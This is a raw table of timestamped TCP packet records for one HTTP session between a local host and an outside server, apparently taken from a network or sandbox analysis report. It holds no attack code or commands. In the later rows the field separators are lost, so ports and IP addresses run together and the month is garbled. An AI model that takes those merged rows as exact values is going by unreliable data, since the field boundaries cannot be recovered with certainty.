                    Mar 20, 2019 16:37:49.920331955 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920367956 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920407057 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920449018 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920474052 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920502901 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920523882 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920545101 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920566082 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920578957 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.920619011 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920660973 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920711040 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920725107 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.920731068 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920774937 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920795918 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920816898 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920836926 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920856953 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920861959 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.920876980 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920897007 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920917034 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920937061 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920957088 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920977116 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.920979023 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.920995951 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.921016932 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.921036005 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.921055079 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.921096087 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.921251059 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.927506924 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.949816942 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.949862003 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.949883938 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.949925900 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.949970007 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950026989 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950071096 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950095892 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950119972 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950128078 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.950169086 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950253963 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950277090 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.950292110 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950315952 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950362921 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950371027 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.950407028 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950433969 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950459957 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950484991 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.950522900 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950591087 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.950594902 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950632095 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950647116 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.950658083 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950706959 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950720072 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.950750113 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950789928 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950814009 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.950823069 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950846910 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950881958 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950907946 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.950915098 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950928926 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950961113 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.950984001 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.951003075 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951026917 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951071978 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.951078892 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951119900 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951127052 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.951143026 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951164961 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951195002 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951208115 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.951226950 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951250076 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951273918 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951316118 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.951330900 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951355934 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951380014 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.951392889 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951416016 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951450109 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951472998 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951476097 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.951494932 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951523066 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951534033 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951555014 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951575994 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951598883 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951621056 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951625109 MEZ | 49204 | 80 | 192.168.1.83 | 31.148.219.163
                    Mar 20, 2019 16:37:49.951642990 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951664925 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951685905 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951714993 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951736927 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mar 20, 2019 16:37:49.951759100 MEZ | 80 | 49204 | 31.148.219.163 | 192.168.1.83
                    Mr 20, 2019 16:37:49.951781034 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.951802969 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.951817989 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.951824903 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.951847076 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.951868057 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.951894045 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.951905966 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.951925993 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.951941013 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.951948881 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.951971054 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.951992035 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.952013969 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.952035904 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.952058077 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.952085018 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.952128887 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.952130079 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.952315092 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.953098059 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953140974 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953169107 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953182936 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.953191042 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953233004 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953290939 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953325987 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953325033 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.953347921 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953370094 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953411102 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953445911 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.953459978 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953469992 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953490973 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953511953 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953547955 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.953568935 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953598022 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953627110 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953649044 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953651905 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.953670025 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953690052 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953712940 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953726053 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953767061 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953802109 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.953824043 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953851938 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953891993 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953908920 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.953938961 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.953962088 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954000950 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954021931 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.954030991 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954066038 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954087019 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954108000 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954129934 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954158068 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.954189062 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954245090 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954269886 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.954283953 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954324007 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954351902 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954375029 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954421997 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954454899 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.954463005 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954500914 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954530954 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954555035 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954586029 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954588890 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.954610109 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954632998 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954667091 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954691887 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.954729080 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954792023 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954802036 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.954818010 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954849958 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954873085 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954895020 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954909086 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.954924107 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954946995 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954969883 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954992056 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955013990 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955035925 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955046892 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.955066919 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955090046 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955121040 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955128908 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955143929 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955164909 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955187082 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955188990 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.955209017 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955231905 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955254078 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955276966 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955291033 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955305099 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.955315113 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955337048 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955358982 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955382109 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955404043 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955421925 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.955426931 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955449104 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955471039 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955511093 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.955558062 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.959779978 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.959826946 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.959850073 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.959872961 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.959891081 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.959894896 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.960378885 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.984309912 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984383106 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984427929 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984471083 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984518051 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984540939 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984602928 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984643936 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984667063 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984688997 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984725952 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984750032 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984806061 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984839916 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984879017 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984900951 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984920979 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984960079 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985001087 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985055923 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985095978 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985125065 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985152006 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985172987 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985213995 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985270977 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985300064 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985321999 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985358000 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985379934 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985399961 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985440016 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985498905 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985532999 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985553980 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985614061 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985649109 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985670090 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985701084 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985758066 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985790014 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985810995 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985851049 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985882998 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985923052 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985956907 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985977888 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986035109 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986069918 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986109972 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986139059 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986181974 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986203909 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986239910 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986259937 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986299992 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986320972 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986341000 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986380100 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986419916 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986459970 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986491919 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986530066 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986571074 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986599922 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986639023 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986680031 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986721992 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986752987 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986792088 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986824036 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986845970 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986881018 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986902952 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986922979 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986951113 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986973047 MEZ804920431.148.219.163192.168.1.83
